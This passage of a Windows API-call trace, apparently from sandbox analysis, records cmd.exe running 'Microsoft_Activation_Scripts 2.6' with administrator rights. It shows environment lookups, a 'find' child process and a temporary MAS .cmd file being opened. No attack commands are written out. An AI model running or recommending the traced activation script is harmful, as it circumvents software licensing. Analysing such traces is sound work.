returned 0x19a8f1e0000 [0178.163] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x420) returned 0x19a8f200ee0 [0178.163] SetErrorMode (uMode=0x0) returned 0x0 [0178.163] SetErrorMode (uMode=0x1) returned 0x0 [0178.163] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x19a8f200ef0, lpFilePart=0x43f9efe7d0 | out: lpBuffer="C:\\Windows\\System32", lpFilePart=0x43f9efe7d0*="System32") returned 0x13 [0178.163] SetErrorMode (uMode=0x0) returned 0x1 [0178.163] GetProcessHeap () returned 0x19a8f1e0000 [0178.163] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f200ee0, Size=0x42) returned 0x19a8f200ee0 [0178.163] GetProcessHeap () returned 0x19a8f1e0000 [0178.163] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f200ee0) returned 0x42 [0178.163] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0178.164] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0178.164] GetProcessHeap () returned 0x19a8f1e0000 [0178.164] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xee) returned 0x19a8f1faff0 [0178.164] GetProcessHeap () returned 0x19a8f1e0000 [0178.164] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x1cc) returned 0x19a8f1f0370 [0178.164] GetProcessHeap () returned 0x19a8f1e0000 [0178.164] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f0370, Size=0xf0) returned 0x19a8f1f0370 [0178.164] GetProcessHeap () returned 0x19a8f1e0000 [0178.164] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1f0370) returned 0xf0 [0178.164] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0178.164] GetProcessHeap () returned 0x19a8f1e0000 [0178.164] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfc) returned 0x19a8f1f0470 [0178.164] GetProcessHeap () returned 0x19a8f1e0000 [0178.164] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1f0470, Size=0x88) returned 0x19a8f1f0470 [0178.164] GetProcessHeap () returned 0x19a8f1e0000 [0178.164] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1f0470) returned 0x88 [0178.164] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0178.164] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\find.*" (normalized: "c:\\windows\\system32\\find.*"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe550, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe550) returned 0x19a8f1f8700 [0178.165] FindClose (in: hFindFile=0x19a8f1f8700 | out: hFindFile=0x19a8f1f8700) returned 1 [0178.165] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\find.COM" (normalized: "c:\\windows\\system32\\find.com"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe550, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe550) returned 0xffffffffffffffff [0178.165] GetLastError () returned 0x2 [0178.165] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\find.EXE" (normalized: "c:\\windows\\system32\\find.exe"), fInfoLevelId=0x1, lpFindFileData=0x43f9efe550, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43f9efe550) returned 0x19a8f1f8ca0 [0178.165] FindClose (in: hFindFile=0x19a8f1f8ca0 | out: hFindFile=0x19a8f1f8ca0) returned 1 [0178.165] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0178.165] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0178.165] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efeab0, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0178.166] InitializeProcThreadAttributeList (in: lpAttributeList=0x43f9efe9d0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x43f9efe8d0 | out: lpAttributeList=0x43f9efe9d0, lpSize=0x43f9efe8d0) returned 1 [0178.166] UpdateProcThreadAttribute (in: lpAttributeList=0x43f9efe9d0, dwFlags=0x0, Attribute=0x60001, lpValue=0x43f9efe8bc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x43f9efe9d0, lpPreviousValue=0x0) returned 1 [0178.166] GetStartupInfoW (in: lpStartupInfo=0x43f9efe960 | out: lpStartupInfo=0x43f9efe960*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0178.166] GetProcessHeap () returned 0x19a8f1e0000 [0178.166] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x20) returned 0x19a8f1f00c0 [0178.166] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0178.166] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0178.166] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0178.166] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0178.166] _wcsnicmp (_String1="COPYCMD", _String2="Black=\"", _MaxCount=0x7) returned 1 [0178.166] _wcsnicmp (_String1="COPYCMD", _String2="Blue=\"4", _MaxCount=0x7) returned 1 [0178.166] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0178.167] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0178.167] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0178.167] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0178.167] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0178.167] _wcsnicmp (_String1="COPYCMD", _String2="eline=e", _MaxCount=0x7) returned -2 [0178.167] _wcsnicmp (_String1="COPYCMD", _String2="esc=\x1b", _MaxCount=0x7) returned -2 [0178.167] _wcsnicmp (_String1="COPYCMD", _String2="Gray=\"1", _MaxCount=0x7) returned -4 [0178.167] _wcsnicmp (_String1="COPYCMD", _String2="Green=\"", _MaxCount=0x7) returned -4 [0178.167] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0178.167] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0178.167] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0178.167] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0178.167] _wcsnicmp (_String1="COPYCMD", _String2="Magenta", _MaxCount=0x7) returned -10 [0178.167] _wcsnicmp (_String1="COPYCMD", _String2="mas=htt", _MaxCount=0x7) returned -10 [0178.167] _wcsnicmp (_String1="COPYCMD", _String2="masver=", _MaxCount=0x7) returned -10 [0178.167] _wcsnicmp (_String1="COPYCMD", _String2="nceline", _MaxCount=0x7) returned -11 [0178.167] _wcsnicmp (_String1="COPYCMD", _String2="nul=>nu", _MaxCount=0x7) returned -11 [0178.167] _wcsnicmp (_String1="COPYCMD", _String2="nul1=1>", _MaxCount=0x7) returned -11 [0178.167] _wcsnicmp (_String1="COPYCMD", _String2="nul2=2>", _MaxCount=0x7) returned -11 [0178.167] _wcsnicmp (_String1="COPYCMD", _String2="nul6=2^", _MaxCount=0x7) returned -11 [0178.167] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0178.167] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0178.167] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0178.167] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0178.167] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0178.168] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0178.168] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0178.168] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0178.168] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0178.168] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0178.168] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0178.168] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0178.168] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0178.168] _wcsnicmp (_String1="COPYCMD", _String2="psc=pow", _MaxCount=0x7) returned -13 [0178.168] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0178.168] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0178.168] _wcsnicmp (_String1="COPYCMD", _String2="Red=\"41", _MaxCount=0x7) returned -15 [0178.168] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0178.168] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0178.168] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0178.168] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0178.168] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0178.168] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0178.168] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0178.168] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0178.168] _wcsnicmp (_String1="COPYCMD", _String2="winbuil", _MaxCount=0x7) returned -20 [0178.168] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0178.168] _wcsnicmp (_String1="COPYCMD", _String2="Yellow=", _MaxCount=0x7) returned -22 [0178.168] _wcsnicmp (_String1="COPYCMD", _String2="_batf=C", _MaxCount=0x7) returned 4 [0178.168] _wcsnicmp (_String1="COPYCMD", _String2="_batp=C", _MaxCount=0x7) returned 4 [0178.168] _wcsnicmp (_String1="COPYCMD", _String2="_Blue=\"", _MaxCount=0x7) returned 4 [0178.168] _wcsnicmp (_String1="COPYCMD", _String2="_cmdf=C", _MaxCount=0x7) returned 4 [0178.168] _wcsnicmp (_String1="COPYCMD", _String2="_Green=", _MaxCount=0x7) returned 4 [0178.169] _wcsnicmp (_String1="COPYCMD", _String2="_NCS=1", _MaxCount=0x7) returned 4 [0178.169] _wcsnicmp (_String1="COPYCMD", _String2="_PSarg=", _MaxCount=0x7) returned 4 [0178.169] _wcsnicmp (_String1="COPYCMD", _String2="_Red=\"4", _MaxCount=0x7) returned 4 [0178.169] _wcsnicmp (_String1="COPYCMD", _String2="_ttemp=", _MaxCount=0x7) returned 4 [0178.169] _wcsnicmp (_String1="COPYCMD", _String2="_White=", _MaxCount=0x7) returned 4 [0178.169] _wcsnicmp (_String1="COPYCMD", _String2="_work=C", _MaxCount=0x7) returned 4 [0178.169] _wcsnicmp (_String1="COPYCMD", _String2="_Yellow", _MaxCount=0x7) returned 4 [0178.169] GetProcessHeap () returned 0x19a8f1e0000 [0178.169] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f00c0) returned 1 [0178.169] GetProcessHeap () returned 0x19a8f1e0000 [0178.169] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x12) returned 0x19a8f1ecc00 [0178.169] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0178.170] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\find.exe", lpCommandLine="find /i \"0x0\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\System32", lpStartupInfo=0x43f9efe8f0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find /i \"0x0\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x43f9efe8d8 | out: lpCommandLine="find /i \"0x0\" ", lpProcessInformation=0x43f9efe8d8*(hProcess=0xac, hThread=0x9c, dwProcessId=0xdac, dwThreadId=0xdb4)) returned 1 [0178.178] CloseHandle (hObject=0x9c) returned 1 [0178.178] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0178.178] GetProcessHeap () returned 0x19a8f1e0000 [0178.178] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f2029e0) returned 1 [0178.178] GetEnvironmentStringsW () returned 0x19a8f20a880* [0178.178] GetProcessHeap () returned 0x19a8f1e0000 [0178.178] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfbe) returned 0x19a8f2029e0 [0178.178] memcpy (in: _Dst=0x19a8f2029e0, _Src=0x19a8f20a880, _Size=0xfbe | out: _Dst=0x19a8f2029e0) returned 0x19a8f2029e0 [0178.178] FreeEnvironmentStringsA (penv="=") returned 1 [0178.179] GetProcessHeap () returned 0x19a8f1e0000 [0178.179] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecc00) returned 1 [0178.179] DeleteProcThreadAttributeList (in: lpAttributeList=0x43f9efe9d0 | out: lpAttributeList=0x43f9efe9d0) [0178.179] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0178.179] _close (_FileHandle=3) returned 0 [0178.179] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0178.179] _close (_FileHandle=4) returned 0 [0178.179] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0xffffffff) returned 0x0 [0178.356] GetExitCodeProcess (in: hProcess=0x84, lpExitCode=0x43f9efed58 | out: lpExitCode=0x43f9efed58*=0x0) returned 1 [0178.356] CloseHandle (hObject=0x84) returned 1 [0178.356] WaitForSingleObject (hHandle=0xac, dwMilliseconds=0xffffffff) returned 0x0 [0178.382] GetExitCodeProcess (in: hProcess=0xac, lpExitCode=0x43f9efed58 | out: lpExitCode=0x43f9efed58*=0x0) returned 1 [0178.382] CloseHandle (hObject=0xac) returned 1 [0178.382] _get_osfhandle (_FileHandle=1) returned 0x24 [0178.382] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0178.382] _get_osfhandle (_FileHandle=1) returned 0x24 [0178.382] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0178.383] _get_osfhandle (_FileHandle=0) returned 0x20 [0178.383] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0178.383] SetConsoleInputExeNameW () returned 0x1 [0178.383] GetConsoleOutputCP () returned 0x1b5 [0178.383] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0178.383] SetThreadUILanguage (LangId=0x0) returned 0x409 [0178.384] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0178.384] _open_osfhandle (_OSFileHandle=0xac, _Flags=8) returned 3 [0178.384] _get_osfhandle (_FileHandle=3) returned 0xac [0178.384] SetFilePointer (in: hFile=0xac, lDistanceToMove=6628, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19e4 [0178.384] GetProcessHeap () returned 0x19a8f1e0000 [0178.384] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f0470) returned 1 [0178.384] GetProcessHeap () returned 0x19a8f1e0000 [0178.385] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f0370) returned 1 [0178.385] GetProcessHeap () returned 0x19a8f1e0000 [0178.385] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1faff0) returned 1 [0178.385] GetProcessHeap () returned 0x19a8f1e0000 [0178.385] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200ee0) returned 1 [0178.386] GetProcessHeap () returned 0x19a8f1e0000 [0178.386] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0930) returned 1 [0178.386] GetProcessHeap () returned 0x19a8f1e0000 [0178.386] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d370) returned 1 [0178.386] GetProcessHeap () returned 0x19a8f1e0000 [0178.386] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb770) returned 1 [0178.387] GetProcessHeap () returned 0x19a8f1e0000 [0178.387] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5f10) returned 1 [0178.387] GetProcessHeap () returned 0x19a8f1e0000 [0178.387] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e5e10) returned 1 [0178.387] GetProcessHeap () returned 0x19a8f1e0000 [0178.387] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa5f0) returned 1 [0178.388] GetProcessHeap () returned 0x19a8f1e0000 [0178.388] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200e80) returned 1 [0178.388] GetProcessHeap () returned 0x19a8f1e0000 [0178.388] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0178.388] GetProcessHeap () returned 0x19a8f1e0000 [0178.389] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa080) returned 1 [0178.389] GetProcessHeap () returned 0x19a8f1e0000 [0178.389] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9f80) returned 1 [0178.389] GetProcessHeap () returned 0x19a8f1e0000 [0178.389] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa6f0) returned 1 [0178.389] GetProcessHeap () returned 0x19a8f1e0000 [0178.390] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200e30) returned 1 [0178.390] GetProcessHeap () returned 0x19a8f1e0000 [0178.390] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ead50) returned 1 [0178.390] GetProcessHeap () returned 0x19a8f1e0000 [0178.390] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20c270) returned 1 [0178.390] GetProcessHeap () returned 0x19a8f1e0000 [0178.391] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6b0) returned 1 [0178.391] GetProcessHeap () returned 0x19a8f1e0000 [0178.391] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eacb0) returned 1 [0178.391] GetProcessHeap () returned 0x19a8f1e0000 [0178.391] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eabb0) returned 1 [0178.391] GetProcessHeap () returned 0x19a8f1e0000 [0178.392] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1fa4f0) returned 1 [0178.392] GetProcessHeap () returned 0x19a8f1e0000 [0178.392] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f200de0) returned 1 [0178.392] GetProcessHeap () returned 0x19a8f1e0000 [0178.392] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f206860) returned 1 [0178.393] GetProcessHeap () returned 0x19a8f1e0000 [0178.393] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f9590) returned 1 [0178.393] GetProcessHeap () returned 0x19a8f1e0000 [0178.393] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecae0) returned 1 [0178.393] GetProcessHeap () returned 0x19a8f1e0000 [0178.394] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb710) returned 1 [0178.394] GetProcessHeap () returned 0x19a8f1e0000 [0178.394] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee190) returned 1 [0178.394] GetProcessHeap () returned 0x19a8f1e0000 [0178.394] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee0d0) returned 1 [0178.394] GetProcessHeap () returned 0x19a8f1e0000 [0178.395] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ea8b0) returned 1 [0178.395] GetProcessHeap () returned 0x19a8f1e0000 [0178.395] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb6e0) returned 1 [0178.395] GetProcessHeap () returned 0x19a8f1e0000 [0178.395] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec8c0) returned 1 [0178.395] GetProcessHeap () returned 0x19a8f1e0000 [0178.395] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee850) returned 1 [0178.395] GetProcessHeap () returned 0x19a8f1e0000 [0178.396] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee010) returned 1 [0178.396] GetProcessHeap () returned 0x19a8f1e0000 [0178.396] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8880) returned 1 [0178.396] GetProcessHeap () returned 0x19a8f1e0000 [0178.396] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb9e0) returned 1 [0178.396] GetProcessHeap () returned 0x19a8f1e0000 [0178.396] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edf50) returned 1 [0178.396] GetProcessHeap () returned 0x19a8f1e0000 [0178.397] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee3d0) returned 1 [0178.397] GetProcessHeap () returned 0x19a8f1e0000 [0178.397] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec900) returned 1 [0178.397] GetProcessHeap () returned 0x19a8f1e0000 [0178.397] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0f70) returned 1 [0178.397] GetProcessHeap () returned 0x19a8f1e0000 [0178.398] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eaed0) returned 1 [0178.398] GetProcessHeap () returned 0x19a8f1e0000 [0178.398] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec700) returned 1 [0178.398] GetProcessHeap () returned 0x19a8f1e0000 [0178.398] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee910) returned 1 [0178.398] GetProcessHeap () returned 0x19a8f1e0000 [0178.398] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edb90) returned 1 [0178.398] GetProcessHeap () returned 0x19a8f1e0000 [0178.399] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb980) returned 1 [0178.399] GetProcessHeap () returned 0x19a8f1e0000 [0178.399] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb740) returned 1 [0178.399] GetProcessHeap () returned 0x19a8f1e0000 [0178.399] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb950) returned 1 [0178.399] GetProcessHeap () returned 0x19a8f1e0000 [0178.399] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee9d0) returned 1 [0178.399] GetProcessHeap () returned 0x19a8f1e0000 [0178.400] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ec6a0) returned 1 [0178.400] GetProcessHeap () returned 0x19a8f1e0000 [0178.400] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ede90) returned 1 [0178.400] GetProcessHeap () returned 0x19a8f1e0000 [0178.400] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb920) returned 1 [0178.400] GetProcessHeap () returned 0x19a8f1e0000 [0178.400] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecba0) returned 1 [0178.400] GetProcessHeap () returned 0x19a8f1e0000 [0178.400] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eddd0) returned 1 [0178.400] GetProcessHeap () returned 0x19a8f1e0000 [0178.401] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edd10) returned 1 [0178.401] GetProcessHeap () returned 0x19a8f1e0000 [0178.401] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb8f0) returned 1 [0178.401] GetProcessHeap () returned 0x19a8f1e0000 [0178.401] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecc60) returned 1 [0178.401] GetProcessHeap () returned 0x19a8f1e0000 [0178.402] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0df0) returned 1 [0178.402] GetProcessHeap () returned 0x19a8f1e0000 [0178.402] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb860) returned 1 [0178.402] GetProcessHeap () returned 0x19a8f1e0000 [0178.402] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1eb800) returned 1 [0178.402] GetProcessHeap () returned 0x19a8f1e0000 [0178.402] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1edc50) returned 1 [0178.402] GetProcessHeap () returned 0x19a8f1e0000 [0178.403] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ee250) returned 1 [0178.403] GetProcessHeap () returned 0x19a8f1e0000 [0178.403] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8820) returned 1 [0178.403] GetProcessHeap () returned 0x19a8f1e0000 [0178.403] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1ecce0) returned 1 [0178.403] GetProcessHeap () returned 0x19a8f1e0000 [0178.404] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1e0a70) returned 1 [0178.404] GetProcessHeap () returned 0x19a8f1e0000 [0178.404] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8a60) returned 1 [0178.404] GetProcessHeap () returned 0x19a8f1e0000 